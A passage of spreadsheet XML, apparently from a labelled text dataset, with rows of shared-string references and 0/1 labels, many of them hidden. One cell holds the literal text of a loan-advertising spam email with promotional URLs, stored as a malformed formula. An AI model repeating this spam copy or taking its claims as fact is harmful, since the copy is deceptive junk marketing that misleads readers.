      <c r="C706" s="1" t="s">
        <v>1284</v>
      </c>
      <c r="D706" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="1">
        <v>705.0</v>
      </c>
      <c r="B707" s="1" t="s">
        <v>1285</v>
      </c>
      <c r="C707" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="D707" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="708" hidden="1">
      <c r="A708" s="1">
        <v>706.0</v>
      </c>
      <c r="B708" s="1" t="s">
        <v>1287</v>
      </c>
      <c r="C708" s="1" t="s">
        <v>1288</v>
      </c>
      <c r="D708" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="1">
        <v>707.0</v>
      </c>
      <c r="B709" s="1" t="s">
        <v>1289</v>
      </c>
      <c r="C709" s="1" t="s">
        <v>1290</v>
      </c>
      <c r="D709" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="710" hidden="1">
      <c r="A710" s="1">
        <v>708.0</v>
      </c>
      <c r="B710" s="1" t="s">
        <v>1291</v>
      </c>
      <c r="C710" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="D710" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="711" hidden="1">
      <c r="A711" s="1">
        <v>709.0</v>
      </c>
      <c r="B711" s="1" t="s">
        <v>1293</v>
      </c>
      <c r="C711" s="1" t="s">
        <v>1294</v>
      </c>
      <c r="D711" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="712" hidden="1">
      <c r="A712" s="1">
        <v>710.0</v>
      </c>
      <c r="B712" s="1" t="s">
        <v>1295</v>
      </c>
      <c r="C712" s="1" t="s">
        <v>1296</v>
      </c>
      <c r="D712" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="713" hidden="1">
      <c r="A713" s="1">
        <v>711.0</v>
      </c>
      <c r="B713" s="1" t="s">
        <v>1297</v>
      </c>
      <c r="C713" s="1" t="s">
        <v>1298</v>
      </c>
      <c r="D713" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="714" hidden="1">
      <c r="A714" s="1">
        <v>712.0</v>
      </c>
      <c r="B714" s="1" t="s">
        <v>1299</v>
      </c>
      <c r="C714" s="1" t="s">
        <v>1300</v>
      </c>
      <c r="D714" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="715" hidden="1">
      <c r="A715" s="1">
        <v>713.0</v>
      </c>
      <c r="B715" s="1" t="s">
        <v>1301</v>
      </c>
      <c r="C715" s="1" t="s">
        <v>1302</v>
      </c>
      <c r="D715" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="1">
        <v>714.0</v>
      </c>
      <c r="B716" s="1" t="s">
        <v>1303</v>
      </c>
      <c r="C716" s="1" t="s">
        <v>1304</v>
      </c>
      <c r="D716" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="717" hidden="1">
      <c r="A717" s="1">
        <v>715.0</v>
      </c>
      <c r="B717" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C717" s="1" t="s">
        <v>1305</v>
      </c>
      <c r="D717" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="1">
        <v>716.0</v>
      </c>
      <c r="B718" s="1" t="s">
        <v>1306</v>
      </c>
      <c r="C718" s="1" t="s">
        <v>1307</v>
      </c>
      <c r="D718" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="719" hidden="1">
      <c r="A719" s="1">
        <v>717.0</v>
      </c>
      <c r="B719" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C719" s="1" t="s">
        <v>1308</v>
      </c>
      <c r="D719" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="720" hidden="1">
      <c r="A720" s="1">
        <v>718.0</v>
      </c>
      <c r="B720" s="1" t="s">
        <v>1309</v>
      </c>
      <c r="C720" s="1" t="s">
        <v>1310</v>
      </c>
      <c r="D720" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="721" hidden="1">
      <c r="A721" s="1">
        <v>719.0</v>
      </c>
      <c r="B721" s="1" t="s">
        <v>1311</v>
      </c>
      <c r="C721" s="1" t="s">
        <v>1312</v>
      </c>
      <c r="D721" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="722" hidden="1">
      <c r="A722" s="1">
        <v>720.0</v>
      </c>
      <c r="B722" s="1" t="s">
        <v>1313</v>
      </c>
      <c r="C722" s="1" t="s">
        <v>1314</v>
      </c>
      <c r="D722" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="723" hidden="1">
      <c r="A723" s="1">
        <v>721.0</v>
      </c>
      <c r="B723" s="1" t="s">
        <v>1315</v>
      </c>
      <c r="C723" s="1" t="s">
        <v>1316</v>
      </c>
      <c r="D723" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="1">
        <v>722.0</v>
      </c>
      <c r="B724" s="1" t="s">
        <v>1317</v>
      </c>
      <c r="C724" s="3" t="str">
        <f>==================================================================
 Now you can have HUNDREDS of lenders compete for your loan!
 FACT: Interest Rates are at their lowest point in 40 years!
 You're eligible even with less than perfect credit !!
 	* Refinancing
 	* New Home Loans
 	* Debt Consolidation
 	* Debt Consultation
 	* Auto Loans
 	* Credit Cards
 	* Student Loans
 	* Second Mortgage
 	* Home Equity
 This Service is 100% FREE without any obligation.
 Visit Our Web Site at:  http://marketing-fashion.com/user0201/index.asp?Afft=QM3
 ====================================================================
 To Unsubscribe: http://marketing-fashion.com/light/watch.asp
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D724" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="1">
        <v>723.0</v>
      </c>
      <c r="B725" s="1" t="s">
        <v>1318</v>
      </c>
      <c r="C725" s="1" t="s">
        <v>1319</v>
      </c>
      <c r="D725" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="726" hidden="1">
      <c r="A726" s="1">
        <v>724.0</v>
      </c>
      <c r="B726" s="1" t="s">
        <v>1320</v>
      </c>
      <c r="C726" s="1" t="s">
        <v>1321</v>
      </c>
      <c r="D726" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="727" hidden="1">
      <c r="A727" s="1">
        <v>725.0</v>
      </c>
      <c r="B727" s="1" t="s">
        <v>66</v>
      </c>
      <c r="C727" s="1" t="s">
        <v>1322</v>
      </c>
      <c r="D727" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="1">
        <v>726.0</v>
      </c>
      <c r="B728" s="1" t="s">
        <v>1323</v>
      </c>
      <c r="C728" s="1" t="s">
        <v>1324</v>
      </c>
      <c r="D728" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="729" hidden="1">
      <c r="A729" s="1">
        <v>727.0</v>
      </c>
      <c r="B729" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="C729" s="1" t="s">
        <v>1326</v>
      </c>
      <c r="D729" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="730" hidden="1">
      <c r="A730" s="1">
        <v>728.0</v>
      </c>
      <c r="B730" s="1" t="s">
        <v>1327</v>
      </c>
      <c r="C730" s="1" t="s">
        <v>1328</v>
      </c>
      <c r="D730" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="731" hidden="1">
      <c r="A731" s="1">
        <v>729.0</v>
      </c>
      <c r="B731" s="1" t="s">
        <v>1329</v>
      </c>
      <c r="C731" s="1" t="s">
        <v>1330</v>
      </c>
      <c r="D731" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="732" hidden="1">
      <c r="A732" s="1">
        <v>730.0</v>
      </c>
      <c r="B732" s="1" t="s">
        <v>1331</v>
      </c>
      <c r="C732" s="1" t="s">
        <v>1332</v>
      </c>
      <c r="D732" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="733" hidden="1">
      <c r="A733" s="1">
        <v>731.0</v>
      </c>
      <c r="B733" s="1" t="s">
        <v>118</v>
      </c>
      <c r="C733" s="1" t="s">
        <v>119</v>
      </c>
      <c r="D733" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="734" hidden="1">
      <c r="A734" s="1">
        <v>732.0</v>
      </c>
      <c r="B734" s="1" t="s">
        <v>745</v>
      </c>
      <c r="C734" s="1" t="s">
        <v>746</v>
      </c>
      <c r="D734" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="735" hidden="1">
      <c r="A735" s="1">
        <v>733.0</v>
      </c>
      <c r="B735" s="1" t="s">
        <v>1333</v>
      </c>
      <c r="C735" s="1" t="s">
        <v>1334</v>
      </c>
      <c r="D735" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="1">
        <v>734.0</v>
      </c>
      <c r="B736" s="1" t="s">
        <v>1335</v>
      </c>
      <c r="C736" s="1" t="s">
        <v>1336</v>
      </c>
      <c r="D736" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="737" hidden="1">
      <c r="A737" s="1">
        <v>735.0</v>
      </c>
      <c r="B737" s="1" t="s">
        <v>1337</v>
      </c>
      <c r="C737" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="D737" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="738" hidden="1">
      <c r="A738" s="1">
        <v>736.0</v>
      </c>
      <c r="B738" s="1" t="s">
        <v>1339</v>
      </c>
      <c r="C738" s="1" t="s">
        <v>1340</v>
      </c>
      <c r="D738" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="739" hidden="1">
      <c r="A739" s="1">
        <v>737.0</v>
      </c>
      <c r="B739" s="1" t="s">
        <v>1341</v>
      </c>
      <c r="C739" s="1" t="s">
        <v>1342</v>
      </c>
      <c r="D739" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="1">
        <v>738.0</v>
      </c>
      <c r="B740" s="1" t="s">
        <v>1343</v>
      </c>
      <c r="C740" s="1" t="s">
        <v>1344</v>
      </c>
      <c r="D740" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="741" hidden="1">
      <c r="A741" s="1">
        <v>739.0</v>
      </c>
      <c r="B741" s="1" t="s">
        <v>1345</v>
      </c>
      <c r="C741" s="1" t="s">
        <v>1346</v>
      </c>
      <c r="D741" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="1">
        <v>740.0</v>
      </c>
      <c r="B742" s="1" t="s">
        <v>1347</v>
      </c>
      <c r="C742" s="1" t="s">
        <v>1348</v>
      </c>
      <c r="D742" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="743" hidden="1">
      <c r="A743" s="1">
        <v>741.0</v>
      </c>
      <c r="B743" s="1" t="s">
        <v>1349</v>
      </c>
      <c r="C743" s="1" t="s">
        <v>1350</v>
      </c>
      <c r="D743" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="744" hidden="1">
      <c r="A744" s="1">
        <v>742.0</v>
      </c>
      <c r="B744" s="1" t="s">
        <v>1351</v>
      </c>
      <c r="C744" s="1" t="s">
        <v>1352</v>
      </c>
      <c r="D744" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="745" hidden="1">
      <c r="A745" s="1">
        <v>743.0</v>
      </c>
      <c r="B745" s="1" t="s">
        <v>1353</v>
      </c>
      <c r="C745" s="1" t="s">
        <v>1354</v>
      </c>
      <c r="D745" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="1">
        <v>744.0</v>
      </c>
      <c r="B746" s="1" t="s">
        <v>1355</v>
      </c>
      <c r="C746" s="1" t="s">
        <v>1356</v>
      </c>
      <c r="D746" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="1">
        <v>745.0</v>
      </c>
      <c r="B747" s="1" t="s">
        <v>1357</v>
      </c>
      <c r="C747" s="1" t="s">
        <v>1358</v>
      </c>
      <c r="D747" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="1">
        <v>746.0</v>
      </c>
      <c r="B748" s="1" t="s">
        <v>1359</v>
      </c>
      <c r="C748" s="1" t="s">
        <v>1360</v>
      </c>
      <c r="D748" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="1">
        <v>747.0</v>
      </c>
      <c r="B749" s="1" t="s">
        <v>1361</v>
      </c>
      <c r="C749" s="1" t="s">
        <v>1362</v>
      </c>
      <c r="D749" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="1">
        <v>748.0</v>
      </c>
      <c r="B750" s="1" t="s">
        <v>1363</v>
      </c>
      <c r="C750" s="1" t="s">
        <v>1364</v>
      </c>
      <c r="D750" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="751" hidden="1">
      <c r="A751" s="1">
        <v>749.0</v>
      </c>
      <c r="B751" s="1" t="s">
        <v>1365</v>
      </c>
      <c r="C751" s="1" t="s">
        <v>1366</v>
      </c>
      <c r="D751" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="752" hidden="1">
      <c r="A752" s="1">
        <v>750.0</v>
      </c>
      <c r="B752" s="1" t="s">
        <v>338</v>
      </c>
      <c r="C752" s="1" t="s">
        <v>1367</v>
      </c>
      <c r="D752" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="753" hidden="1">
      <c r="A753" s="1">
        <v>751.0</v>
      </c>
      <c r="B753" s="1" t="s">
        <v>1368</v>
      </c>
      <c r="C753" s="1" t="s">
        <v>1369</v>
      </c>
      <c r="D753" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="754" hidden="1">
      <c r="A754" s="1">
        <v>752.0</v>
      </c>
      <c r="B754" s="1" t="s">
        <v>1370</v>
      </c>
      <c r="C754" s="1" t="s">
        <v>1371</v>
      </c>
      <c r="D754" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="755" hidden="1">
      <c r="A755" s="1">
        <v>753.0</v>
      </c>
      <c r="B755" s="1" t="s">
        <v>1372</v>
      </c>
      <c r="C755" s="1" t="s">
        <v>1373</v>
      </c>
      <c r="D755" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="1">
        <v>754.0</v>
      </c>
      <c r="B756" s="1" t="s">
        <v>1374</v>
      </c>
      <c r="C756" s="1" t="s">
        <v>1375</v>
      </c>
      <c r="D756" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="1">
        <v>755.0</v>
      </c>
      <c r="B757" s="1" t="s">
        <v>1376</v>
      </c>
      <c r="C757" s="1" t="s">
        <v>1377</v>
      </c>
      <c r="D757" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="758" hidden="1">
      <c r="A758" s="1">
        <v>756.0</v>
      </c>
      <c r="B758" s="1" t="s">
        <v>1378</v>
      </c>
      <c r="C758" s="1" t="s">
        <v>1379</v>
      </c>
      <c r="D758" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="759" hidden="1">
      <c r="A759" s="1">
        <v>757.0</v>
      </c>
      <c r="B759" s="1" t="s">
        <v>1380</v>
      </c>
      <c r="C759" s="1" t="s">
        <v>1381</v>
      </c>
      <c r="D759" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="760" hidden="1">
      <c r="A760" s="1">
        <v>758.0</v>
      </c>
      <c r="B760" s="1" t="s">
        <v>1382</v>
      </c>
      <c r="C760" s="1" t="s">
        <v>1383</v>
      </c>
      <c r="D760" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="1">
        <v>759.0</v>
      </c>
      <c r="B761" s="1" t="s">
        <v>1384</v>
      </c>
      <c r="C761" s="1" t="s">
        <v>1385</v>
      </c>
      <c r="D761" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="762" hidden="1">
      <c r="A762" s="1">
        <v>760.0</v>
      </c>
      <c r="B762" s="1" t="s">
        <v>1386</v>
      </c>
      <c r="C762" s="1" t="s">
        <v>1387</v>
      </c>
      <c r="D762" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="763" hidden="1">
      <c r="A763" s="1">
        <v>761.0</v>
      </c>
      <c r="B763" s="1" t="s">
        <v>1388</v>
      </c>
      <c r="C763" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="D763" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="764" hidden="1">
      <c r="A764" s="1">
        <v>762.0</v>
      </c>
      <c r="B764" s="1" t="s">
        <v>1075</v>
      </c>
      <c r="C764" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="D764" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="1">
        <v>763.0</v>
      </c>
      <c r="B765" s="1" t="s">
        <v>1391</v>
      </c>
      <c r="C765" s="1" t="s">
        <v>1392</v>
      </c>
      <c r="D765" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="1">
        <v>764.0</v>
      </c>
      <c r="B766" s="1" t="s">
        <v>822</v>
      </c>
      <c r="C766" s="1" t="s">
        <v>823</v>
      </c>
      <c r="D766" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="767" hidden="1">
      <c r="A767" s="1">
        <v>765.0</v>
      </c>
      <c r="B767" s="1" t="s">
        <v>1393</v>
      </c>
      <c r="C767" s="1" t="s">
        <v>1394</v>
      </c>
      <c r="D767" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="768" hidden="1">
      <c r="A768" s="1">
        <v>766.0</v>
      </c>
      <c r="B768" s="1" t="s">
        <v>1395</v>
      </c>
      <c r="C768" s="1" t="s">
        <v>1396</v>
      </c>
      <c r="D768" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="769" hidden="1">
      <c r="A769" s="1">
        <v>767.0</v>
      </c>
      <c r="B769" s="1" t="s">
        <v>1397</v>
      </c>
      <c r="C769" s="1" t="s">
        <v>1398</v>
      </c>
      <c r="D769" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="770" hidden="1">
      <c r="A770" s="1">
        <v>768.0</v>
      </c>
      <c r="B770" s="1" t="s">
        <v>1399</v>
      </c>
      <c r="C770" s="1" t="s">
        <v>1400</v>
      </c>
      <c r="D770" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="1">
        <v>769.0</v>
      </c>
      <c r="B771" s="1" t="s">
        <v>1401</v>
      </c>
      <c r="C771" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="D771" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="772" hidden="1">
      <c r="A772" s="1">
        <v>770.0</v>
      </c>
      <c r="B772" s="1" t="s">
        <v>1403</v>
      </c>
      <c r="C772" s="1" t="s">
        <v>1404</v>
      </c>
      <c r="D772" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="1">
        <v>771.0</v>
      </c>
      <c r="B773" s="1" t="s">
        <v>1405</v>
      </c>
      <c r="C773" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="D773" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="774" hidden="1">
      <c r="A774" s="1">
        <v>772.0</v>
      </c>
      <c r="B774" s="1" t="s">
        <v>1407</v>
      </c>
      <c r="C774" s="1" t="s">
        <v>1408</v>
      </c>
      <c r="D774" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="775" hidden="1">
      <c r="A775" s="1">
        <v>773.0</v>
      </c>
      <c r="B775" s="1" t="s">
        <v>1409</v>
      </c>
      <c r="C775" s="1" t="s">
        <v>1410</v>
      </c>
      <c r="D775" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="776" hidden="1">
      <c r="A776" s="1">
        <v>774.0</v>
      </c>
      <c r="B776" s="1" t="s">
        <v>986</v>
      </c>
      <c r="C776" s="1" t="s">
        <v>1411</v>
      </c>
      <c r="D776" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="777" hidden="1">
      <c r="A777" s="1">
        <v>775.0</v>
      </c>
      <c r="B777" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="C777" s="1" t="s">
        <v>1413</v>
      </c>
      <c r="D777" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="778" hidden="1">
      <c r="A778" s="1">
        <v>776.0</v>
      </c>
      <c r="B778" s="1" t="s">
        <v>1414</v>
      </c>
      <c r="C778" s="1" t="s">
        <v>1415</v>
      </c>
      <c r="D778" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="779" hidden="1">
      <c r="A779" s="1">
        <v>777.0</v>
      </c>
      <c r="B779" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="C779" s="1" t="s">
        <v>1417</v>
      </c>
      <c r="D779" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="780" hidden="1">
      <c r="A780" s="1">
        <v>778.0</v>
      </c>
      <c r="B780" s="1" t="s">
        <v>1418</v>
      </c>
      <c r="C780" s="1" t="s">
        <v>1419</v>
      </c>
      <c r="D780" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="1">
        <v>779.0</v>
      </c>
      <c r="B781" s="1" t="s">
        <v>1420</v>
      </c>
      <c r="C781" s="1" t="s">
        <v>1421</v>
      </c>
      <c r="D781" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="1">
        <v>780.0</v>
      </c>
      <c r="B782" s="1" t="s">
        <v>1046</v>
      </c>
      <c r="C782" s="1" t="s">
        <v>1047</v>
      </c>
      <c r="D782" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="783" hidden="1">
      <c r="A783" s="1">
        <v>781.0</v>
      </c>
      <c r="B783" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C783" s="1" t="s">
        <v>1422</v>
      </c>
      <c r="D783" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="784" hidden="1">
      <c r="A784" s="1">
        <v>782.0</v>
      </c>
      <c r="B784" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C784" s="1" t="s">
        <v>1424</v>
      </c>
      <c r="D784" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="785" hidden="1">
      <c r="A785" s="1">
        <v>783.0</v>
      </c>
      <c r="B785" s="1" t="s">
        <v>1425</v>
      </c>
      <c r="C785" s="1" t="s">
        <v>1426</v>
      </c>
      <c r="D785" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="1">
        <v>784.0</v>
      </c>
      <c r="B786" s="1" t="s">
        <v>1427</v>
      </c>
      <c r="C786" s="1" t="s">
        <v>1428</v>
      </c>
      <c r="D786" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="1">
        <v>785.0</v>
      </c>
      <c r="B787" s="1" t="s">
        <v>1429</v>
      </c>
      <c r="C787" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="D787" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="788" hidden="1">
      <c r="A788" s="1">
        <v>786.0</v>
      </c>
      <c r="B788" s="1" t="s">
        <v>1431</v>
      </c>
      <c r="C788" s="1" t="s">
        <v>1432</v>
      </c>
      <c r="D788" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="789" hidden="1">
      <c r="A789" s="1">
        <v>787.0</v>
      </c>
      <c r="B789" s="1" t="s">
        <v>1433</v>
      </c>
      <c r="C789" s="1" t="s">
        <v>1434</v>
      </c>
      <c r="D789" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="790" hidden="1">
      <c r="A790" s="1">
        <v>788.0</v>
      </c>
      <c r="B790" s="1" t="s">
        <v>1435</v>
      </c>
      <c r="C790" s="1" t="s">
        <v>1436</v>
      </c>
      <c r="D790" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="791" hidden="1">
      <c r="A791" s="1">
        <v>789.0</v>
      </c>
      <c r="B791" s="1" t="s">
        <v>563</v>
      </c>
      <c r="C791" s="1" t="s">
        <v>1437</v>
      </c>
      <c r="D791" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="1">
        <v>790.0</v>
      </c>
      <c r="B792" s="1" t="s">
        <v>1438</v>
      </c>
      <c r="C792" s="1" t="s">
        <v>1439</v>
      </c>
      <c r="D792" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="1">
        <v>791.0</v>
      </c>
      <c r="B793" s="1" t="s">
        <v>1440</v>
      </c>
      <c r="C793" s="1" t="s">
        <v>1441</v>
      </c>
      <c r="D793" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="794" hidden="1">
      <c r="A794" s="1">
        <v>792.0</v>
      </c>
      <c r="B794" s="1" t="s">
        <v>957</v>
      </c>
      <c r="C794" s="1" t="s">
        <v>958</v>
      </c>
      <c r="D794" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="1">
        <v>793.0</v>
      </c>
      <c r="B795" s="1" t="s">
        <v>1442</v>
      </c>
      <c r="C795" s="1" t="s">
        <v>1443</v>
      </c>
      <c r="D795" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="796" hidden="1">
      <c r="A796" s="1">
        <v>794.0</v>
      </c>
      <c r="B796" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C796" s="1" t="s">
        <v>1444</v>
      </c>
      <c r="D796" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="1">
        <v>795.0</v>
      </c>
      <c r="B797" s="1" t="s">
        <v>1445</v>
      </c>
      <c r="C797" s="1" t="s">
        <v>1446</v>
      </c>
      <c r="D797" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="798" hidden="1">
      <c r="A798" s="1">
        <v>796.0</v>
      </c>
      <c r="B798" s="1" t="s">
        <v>1447</v>
      </c>
      <c r="C798" s="1" t="s">
        <v>1448</v>
      </c>
      <c r="D798" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="799" hidden="1">
      <c r="A799" s="1">
        <v>797.0</v>
      </c>
      <c r="B799" s="1" t="s">
        <v>1449</v>
      </c>
      <c r="C799" s="1" t="s">
        <v>1450</v>
      </c>
      <c r="D799" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="800" hidden="1">
      <c r="A800" s="1">
        <v>798.0</v>
      </c>
      <c r="B800" s="1" t="s">
        <v>1451</v>
      </c>
      <c r="C800" s="1" t="s">
        <v>1452</v>
      </c>
      <c r="D800" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="801" hidden="1">
      <c r="A801" s="1">
        <v>799.0</v>
      </c>
      <c r="B801" s="1" t="s">
        <v>1453</v>
      </c>
      <c r="C801" s="1" t="s">
        <v>1454</v>
      </c>
      <c r="D801" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="802" hidden="1">
      <c r="A802" s="1">
        <v>800.0</v>
      </c>
      <c r="B802" s="1" t="s">
        <v>1455</v>
      </c>
      <c r="C802" s="1" t="s">
        <v>1456</v>
      </c>
      <c r="D802" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="1">
        <v>801.0</v>
      </c>
      <c r="B803" s="1" t="s">
        <v>1457</v>
      </c>
      <c r="C803" s="1" t="s">
        <v>1458</v>
      </c>
      <c r="D803" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="804" hidden="1">
      <c r="A804" s="1">
        <v>802.0</v>
      </c>
      <c r="B804" s="1" t="s">
        <v>1459</v>
      </c>
      <c r="C804" s="1" t="s">
        <v>1460</v>
      </c>
      <c r="D804" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="805" hidden="1">
      <c r="A805" s="1">
        <v>803.0</v>
      </c>
      <c r="B805" s="1" t="s">
        <v>486</v>
      </c>
      <c r="C805" s="1" t="s">
        <v>1461</v>
      </c>
      <c r="D805" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="806" hidden="1">
      <c r="A806" s="1">
        <v>804.0</v>
      </c>
      <c r="B806" s="1" t="s">
        <v>1462</v>
      </c>
      <c r="C806" s="1" t="s">
        <v>1463</v>
      </c>
      <c r="D806" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="807" hidden="1">
      <c r="A807" s="1">
        <v>805.0</v>
      </c>
      <c r="B807" s="1" t="s">
        <v>986</v>
      </c>
      <c r="C807" s="1" t="s">
        <v>1464</v>
      </c>
      <c r="D807" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="808" hidden="1">
      <c r="A808" s="1">
        <v>806.0</v>
      </c>
      <c r="B808" s="1" t="s">
        <v>1465</v>
      </c>
      <c r="C808" s="1" t="s">
        <v>1466</v>
      </c>
      <c r="D808" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="1">
        <v>807.0</v>
      </c>
      <c r="B809" s="1" t="s">
        <v>1467</v>
      </c>
      <c r="C809" s="1" t="s">
        <v>1468</v>
      </c>
      <c r="D809" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="810" hidden="1">
      <c r="A810" s="1">
        <v>808.0</v>
      </c>
      <c r="B810" s="1" t="s">
        <v>1469</v>
      </c>
      <c r="C810" s="1" t="s">
        <v>1470</v>
      </c>
      <c r="D810" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="811" hidden="1">
      <c r="A811" s="1">
        <v>809.0</v>
      </c>
      <c r="B811" s="1" t="s">
        <v>78</v>
      </c>
      <c r="C811" s="1" t="s">
        <v>1471</v>
      </c>
      <c r="D811" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="812" hidden="1">
      <c r="A812" s="1">
        <v>810.0</v>
      </c>
      <c r="B812" s="1" t="s">
